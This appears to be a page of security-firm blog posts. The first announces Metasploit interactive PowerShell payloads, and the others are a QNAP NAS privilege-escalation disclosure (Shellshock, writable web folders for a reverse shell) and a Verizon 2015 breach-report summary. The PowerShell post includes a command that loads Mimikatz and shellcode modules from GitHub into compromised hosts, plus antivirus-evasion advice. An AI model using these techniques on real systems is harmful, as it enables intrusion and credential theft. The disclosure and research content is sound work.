Loading A Weaponised Interactive PowerShell Session With Metasploit

PowerShell is rapidly becoming the go to post exploitation method for hackers, with a plethora of awesome PowerShell tools such as PowerSploit, PowerUp, PowerView and Nishang, to name a few. The standard PowerShell environment can be quickly extended into a hacker’s delight.

These ‘tools’ are written entirely in PowerShell and do not touch disk (largely) – therefore they are anti-virus (AV) friendly and do not involve risky process injections. However, it has not all been plain sailing – achieving a remote interactive PowerShell session (without the use of PSRemoteing or WinRM) has often been an inconvenience. As security professionals, here at Nettitude we are keen to solve this issue. At present, Metasploit offers some post PowerShell modules to execute scripts or standalone tools, but there is nothing like having an interactive shell.

Enter the new Interactive PowerShell payloads for Metasploit written by Nettitude consultants, Ben Turner (@benpturner) and Dave Hardy (@davehardy20).

These payloads offer the ability to have an interactive PowerShell session on an already compromised host, via the windows/local/payload_inject module (see Figure 1).

Figure 1 - Reverse session using new Interactive Powershell payload

Figure 1 – Reverse session using new Interactive Powershell payload

Alternatively, you can use the new payloads as a replacement for the normal Metasploit payloads, such as windows/meterpreter/reverse_tcp when using PSEXEC for example (See Figure 2).

Figure 2 - Executing powershell_bind_tcp through PSEXEC.

Figure 2 – Executing powershell_bind_tcp through PSEXEC.

The payloads provide not just an interactive PowerShell session, but can be remotely ‘weaponised’ with the modules of your choosing (i.e. PowerSploit, PowerTools). Just set the LOAD_MODULES option within the payload with a comma-separated string of a web server or local network location where the modules are hosted – handy if you don’t have Internet access.

For example, if you are lucky enough to have Internet access from your target, you can use the GitHub repositories directly like so:

Set LOAD_MODULES https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1,https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke–Shellcode.ps1,………..

Figure 3 - Fully weaponised PowerShell session

Figure 3 – Fully weaponised PowerShell session

As you can see in Figure 3, we now have an interactive PowerShell session in Metasploit and the console reports that it has loaded ten modules.

In total, there are actually four new Interactive PowerShell payloads, two that work for the processes above and two more that will work with msfvenom, or the generate option within msfconsole, which create standalone bind and reverse payloads that can be uploaded and executed separately (see Figure 4).

Figure 4 - Generating a powerShell_reverse_tcp payload

Figure 4 – Generating a powerShell_reverse_tcp payload

But we know the burning question is…’does mimikatz work this way?’…Well, yes it does. As with all things mimikatz you need to get hold of some SYSTEM privs somehow (but it’s Windows, so no dramas there). Then run the excellent PowerSploit ‘invoke-mimikatz’ commandlet in your newly weaponsied PowerShell session and BOOM! (Kudos to @JosephBialek, @gentilkiwi and @mattifestation for making this module a reality!)

Figure 5 - Mimikatz over PowerShell interactive Metasploit session

Figure 5 – Mimikatz over PowerShell interactive Metasploit session

The rest really is up to you!

“So where do I get this awesomeness?”
The PowerShell payloads are in the main Metasploit tree, so all you need to do is get the latest and greatest Metasploit Framework git version including commit – https://github.com/rapid7/metasploit-framework/pull/5194

Or if you are looking for the standalone scripts they are available here – https://github.com/nettitude/powershell

Happy hunting.

Background

Looking for something a bit more local or don’t have Metasploit? Read on!

As an extra to the Metasploit payloads and also to give some background to the work behind the module, we are publishing the initial scripts that were developed to ‘weaponise’ a standard windows PowerShell session. The PowerShell scripts were first used as Proof of Concept and early Metasploit modules.

These are essentially just loops that read the remote GitHub repository of PowerSploit, PowerView and PowerUp and use the PowerShell ‘download cradle’ method or ‘local’ web server version to retrieve the PowerShell modules (useful when there is no Internet access).

The scripts are as follows;

  • In-memory-downloader.ps1 – downloads and installs the modules into memory, no AV stress
  • Local-in-memory-downloader.ps1 – the local network version of the above, although this requires a local web server
  • Powersploit-downloader.ps1 – this script and the corresponding Powertools-downloader.ps1 download to disk and installs the modules. These are for systems with no Anti-Virus (which doesn’t detect the modules). Another reason for this method is that some of these tools will not run fully just in memory.

The scripts themselves are easy to use just copy and paste the download cradle command into an active PowerShell session (see Figure 6) on which the ‘in-memory-downloader.ps1’ script has been run.

Figure 6 - Executing in-memory-downloader.ps1

Figure 6 – Executing in-memory-downloader.ps1

Future Development

We will look to include SSL support for the payloads and hopefully create additional POST modules that work with the new Metasploit PowerShell session. Currently, we have not developed any at this time, as the integration of these modules was reliant on the new session type being integrated into Metasploit. As this has now been completed and approved in the core Metasploit framework we can start development for these modules.

 

 

To contact Nettitude’s editor, please email media@nettitude.com.

 

QNAP NAS – Remote Unauthenticated User to Admin Shell: Part 2

tl;dr

A number of security vulnerabilities have been identified in two applications hosted on the QNAP App Center. When combined it is possible for a remote unauthenticated user to gain interactive remote administrative access and take full control of the device.

Introduction

In the previous blog post, it was shown that the Logitech Media Server (7.7.2) App suffers from Shellshock. The situation is further aggravated by the developer’s decision not to implement the chroot configuration option.  However, the account that the application runs under and thus the Bash commands are executed under, does not have root/administrative permissions.

The ultimate objective of exploit development is to gain a root/administrative remote shell, thus leaving no room for debate on the seriousness of the issue. The system has been completely exploited and is under the full control of the attacker. End of story, no debate. With this in mind, I began to examine the system to identify a means to execute a reverse-shell and gain privileged credentials.

Vulnerability 1 – Weak Folder Permissions iStat 0.5.7

The iStat application is used to monitor system resource utilisation. The user is free to decide what is monitored and to what level. The data is displayed via a web interface that is hosted on the device’s main web server. It is accessed via http://<ip_address>/istat/login.php.

A traditional or bind shell instructs a machine to open a command shell, present it on a port and wait for inbound connections. Thus granting a user or for that matter an attacker, interactive access. However, with the widespread adoption of firewalls their effectiveness has become somewhat limited, as inbound connections are highly controlled. In contrast, a reverse shell rather than waiting for an incoming connection, actively connects back to a machine. As firewalls are typically much more permissive of outbound connections, reverse shells have become dominant.

A bind or reverse shell can be written in pretty much any language. If coded in a language that can be executed by a web-server (e.g. ASP, ASP.NET, PHP, etc.) and providing that an attacker can write to a suitable location, the shell will be spawned and access granted. By recursively searching the file-system we can see that iStat has weak folder permissions. Everyone, including the ssods/Logitech Media Server account has the ability to read/write/execute (see Figure 1).

Figure 1 – Everyone RWX directory served by Apache

 

This folder is served by the application’s web server and will thus execute a suitably coded reverse-shell.

Vulnerability 2 – Web Server Runs With Administrative Permissions

iStat is hosted on an Apache instance. It runs under an account called httpdusr, which is a member of the Administrators group. Thus when a reverse-shell is executed, it grants the attacker administrative access to the device (see Figure 2).

Vulnerability 2 – Web Server Runs With Administrative Permissions

Summary

iStat 0.5.7 hosted on the QNAP App Center suffers from several security issues. They do not grant remote unauthenticated access. However, once an attacker gains limited access they can be leveraged to obtain administrative privileges. The sixteen thousand customers who have downloaded it should uninstall it immediately.

In conclusion, this two-part blog illustrates a pattern we see in many contemporary attacks. Multiple vulnerabilities, mistakes, and weaknesses chained together to achieve full exploitation (see Figure 3). If any one of them is missing an attacker fails to get administrative access. If the chain can be formed its game over and the attacker wins.

Figure 3 - kill chain

The release of this information has followed the responsible disclosure model. All research has been forwarded to QNAP and the date of disclosure mutually agreed. CERT has been informed and is tracking this issue.

Timeline

  • Logitech Media Center Shellshock vulnerability discovery on 08/02/2015
  • QNAP informed via website on 11/02/2015
  • SSOTS/SSODS author contacted 12/02/2015. No response to date
  • Reported to cert.org on 12/02/2015
  • Confirmed against latest firmware and ARM plus x86 devices on 16/02/2015
  • Local privilege elevation discovery on 22/02/2015
  • QNAP contacted via facebook.com on 05/03/2015
  • Proof of concept completed on 06/03/2015
  • Contacted by QNAP Security. Research forwarded and disclosure date agreed on 07/03/2015
  • Vulnerability disclosed on 06/04/2015

References

 

 

To contact Nettitude’s editor, please email media@nettitude.com.

Verizon Data Breach Report 2015

Verizon Data Breach Report 2015A high level summary of the main findings from the cyber security industry’s favourite data driven report. As usual, the report is an easy read packed with analysis and information that is appetising and relevant.

The key concerns centre on the age old favourite threat scenarios of patch management and phishing attacks.

An attempt to elevate mobile applications to significance within the report left the pages with two truths – Android is much worse than any other platform (now that’s hard to have guessed!), and the reality that the majority of all malicious apps have a very short life span (4 out of 5 not lasting beyond a week!).

The Internet of Things (IoT) leaves a small read too (housed in one of the appendixes) because when the proof of concepts and media hype is removed, little real world data breach data is available. The growth in these devices is increasing though – so keep watching this space as we see their use and prevalence within our digital world spiral up.

http://www.verizonenterprise.com/resources/reports/rp_data-breach-investigation-report-2015-insider_en_xg.pdf

We include at the end of this article a summary of the main statistics if you’re after the headlines.

But back to patching and phishing – What’s the news?

Sticking Plasters or Stinking Patches?

The much anticipated annual Verizon Data Breach Report has been released with compelling warnings about the perils of leaving your systems unpatched. The same day also sees the most common vendors release a barrage of fixes for their applications and platforms.

If you run software from Microsoft, Adobe or Oracle then you have critical patches to be applied! In total that’s 22 for Adobe Flash Player, 11 update bundles from Microsoft addressing over 24 bugs and a sleuth of Java updates (15) all of which are exploitable remotely (See Brian Krebs for full details! – http://krebsonsecurity.com/2015/04/critical-updates-for-windows-flash-java/)

Staggeringly, Verizon tells us that 10 separate CVEs account for almost 97% of the exploits observed in 2014. Before you relax and think all your patching problems are wound up in 10 simple patches, the remianing 3% delivers over 7 millions observed exploits against different vulnerabilities – oh yes, patching is STILL a major issue for many organisations!

99.9% of the exploited vulnerabilities were compromised over a year after they were published. A significant number of vulnerabilities being exploited are spread out over the last ten years, showing that for many attackers, older vulnerabilities are still relevant today!

Plenty of Phish are still in the sea

The finest hour for phishing is that first hour when 50% of all phishing emails are triggered. The median time-to-first-click based on a sample of 150,000 monitoring phishing tests showed this to be at 1 minute and 22 seconds. The realisation that our email and internet systems still give us one serious attack surface is highlighted with vivid effect.

Why is it called phishing?The stark reality of this report shows that phishing emails are a major factor in most organisations. Our email systems are by design set-up to allow a broad range of inbound communications to enter our business. As much as we try to control this the ability for malicious users to construct targeted, custom, believable messages based on our public profiles and digital footprints is not going to change.

As generic SPAM does get filtered the trojan horse deliveries will continue to be hidden in the legitimate traffic. Education still has a long way to go, but a more fundamental acceptance that any internet connected or email based network inherently holds a higher risk needs to be much better understood. We have to wake up to the fact that even the best and most informed users will have moments of weakness and if presented with a credible, believable email from a known source – may action the unwanted actions we are trying to stop.

Waking up to the risk

The approach needs to change so that we treat email and internet usage as an area of higher risk and protect the real assets of value within our businesses from these systems. Rather than see our internet connection itself as the place for defences, it needs to be constructed around our assets of high value within an internal secure enclave.
Nightingale floorThe Japanese did this with their Nightingale floor that was designed to shift and move and make sounds when people walked over them. Nails and clamps in the floor ensured the board squeeked giving out a sounds like the Nightingale bird (hence the name).Structure of Uguisu-bari

This gave the occupants of the building time to respond to approaching attackers even after they were inside their castle moats.
The speed at which organisations need to respond will only get shorter as the attackers know how our ability to respond is getting better. This is always an arms race and we need to be adapting and thinking of the bigger picture.

  • What is it that we are protecting and from whom?
  • What risks need to be better controlled?
  • How can we protect those assets from these risks?

Expecting phishing attacks to work means that we will then look for and hunt for the actions within our networks that demonstrate an attacker is in there and sniffing around.

If we can’t stop them getting in, let’s make sure we can detect and respond effectively when they do – and ensure anything of value is not there waiting for them.

Summary of Stats

If you’re simply after a summary of insightful stats to impress the folks in the office, your parents or mates down the pub with then here is the roundup of the best:

  • Threat Intelligence should focus on the well not the firehose – in other words quality is far better than quantity
  • For two years, more than two-thirds of incidents that comprise the Cyber-Espionage pattern have featured phishing
  • Nearly 50% of users open e-mails and click on phishing links within the first hour
  • 23% of recipients now opening phishing messages and 11% clicking on attachments
  • About half of the CVEs exploited in 2014 went from publish to pwn in less than a month
  • A CVE being added to metasploit or given a cool name was as good an indicator as any that a vulnerability would be having a big impact
  • An average of 0.03% of smartphones per week—out of tens of millions of mobile devices on the Verizon network — were infected with “higher-grade” malicious code
  • 4 out of 5 mobile malicious apps didn’t last beyond a week with 96% of malicious mobile malware aimed at Android
  • Malware is the big news of the day – 70-90% of malware samples are unique to an organisation
  • However, 70% of all malware is derived from around 20 key families

 

 

To contact Nettitude’s editor, please email media@nettitude.com.

QNAP NAS – Remote Unauthenticated User To Admin Shell: Part 1

tl;dr

A number of security vulnerabilities have been identified in two applications hosted on the QNAP App Centre. When combined, it is possible for a remote unauthenticated user to gain interactive remote administrative access and take full control of the device.

Introduction

As a security professional you are constantly sharpening your skills; investigating a new tool, taking a device apart (at both the software and hardware level), or writing a script to hunt for a particular class of vulnerability. After all, everyone wants a secure network. It is all part of the same constantly evolving game. You can imagine my surprise when I ran my latest Python script at home and got a hit. Surely this couldn’t be right. I had only finished the first iteration that morning and it certainly wasn’t yet ready for prime-time. After much head scratching, debugging, and finally the running of other scanners, I had my answer. My QNAP network attached storage (NAS) device; the system holding all my important data, family photos, holiday movies, and financial details was suffering from a National Vulnerability Database (NVD) rated 10.0 exploit.

Vulnerability 1 – Remote Code Execution in Logitech Media Server 7.7.2

The Logitech Media Server App is a streaming audio server for the Squeezebox range of digital audio receivers. The version hosted on the QNAP App centre comes bundled with an additional third party application, called Squeezebox Server on TurboStation (SSOTS). SSOTS aims to augment the host environment, in such a way as to allow the Logitech software to run. It has a web based administrative interface on port 9099. As illustrated in Figure 1 this suffers from Shellshock.

Figure 1 - Bash command via Shellshock

Figure 1 – Bash command via Shellshock

Shellshock is arguably the biggest security revelation of 2014. It can not only allow an attacker to gain remote code execution, but once identified, it is easy to exploit. When a Bash process creates a child Bash process, the parent’s function definitions are exported via environment variables. These begin with “()”, followed by the actual function definition. The child process identifies these environment variables, converts them back to functions, and executes them. Unfortunately, on vulnerable systems this process is flawed and it grants an attacker the opportunity to define what code is included in an exported function and thus what is executed. If the parent process is network facing this can result in remote code execution.

In this case, the root cause of the exploit is the version of Bash bundled with SSOTS (see Figure 2). Even though QNAP remediated Shellshock late last year, because this application maintains its own outdated version of Bash, the vulnerability remains unpatched.

Figure 2 - Bundled version of Bash

Figure 2 – Bundled version of Bash

Vulnerability 2 – Web Server Configuration for Logitech Media Server 7.7.2

SSOTS also deploys its own web server, thttpd. It can be configured to run within a chroot. A chroot changes the apparent root directory for a running process. This means that the available files and commands are restricted to those below this point.  It is as if the rest of the file system does not exist.  Although not without limitations, in this case if correctly implemented, it would have provided additional protection. Unfortunately (see Figure 3) it has not been implemented and an attacker has access to the entire file system.

Figure 3 - Chroot not Implemented

Figure 3 – Chroot not Implemented

Now for some good news

SSOTS runs under the ssods account, which has limited privileged access. This restricts what an attacker can do. For example, we cannot read the most sensitive system files (see Figure 4).

Figure 4 - Insufficient privileges to read

Figure 4 – Insufficient privileges to read /etc/shadow

 

Summary

Logitech Media Server (7.7.2) hosted on the QNAP App Center suffers from multiple serious security issues. The twenty-seven thousand QNAP customers who have downloaded it should uninstall it immediately. Further, the wider community of SSOTS/SSODS users should check their systems for these vulnerabilities. In part two we will continue the journey and see how to elevate privileges. Once again the answer resides in the QNAP App Centre.

The release of this information has followed the responsible disclosure model. All research has been forwarded to QNAP and the date of disclosure mutually agreed. CERT has been informed and is tracking this issue.

Timeline

  • Logitech Media Center Shellshock vulnerability discovery on 08/02/2015
  • QNAP informed via website on 11/02/2015
  • SSOTS/SSODS author contacted 12/02/2015. No response to date
  • Reported to cert.org on 12/02/2015
  • Confirmed against latest firmware and ARM plus x86 devices on 16/02/2015
  • Local privilege elevation discovery on 22/02/2015
  • QNAP contacted via facebook.com on 05/03/2015
  • Proof of concept completed on 06/03/2015
  • Contacted by QNAP Security. Research forwarded and disclosure date agreed on 07/03/2015
  • Vulnerability disclosed on 06/04/2015

References

 

 

To contact Nettitude editor, please email media@nettitude.com.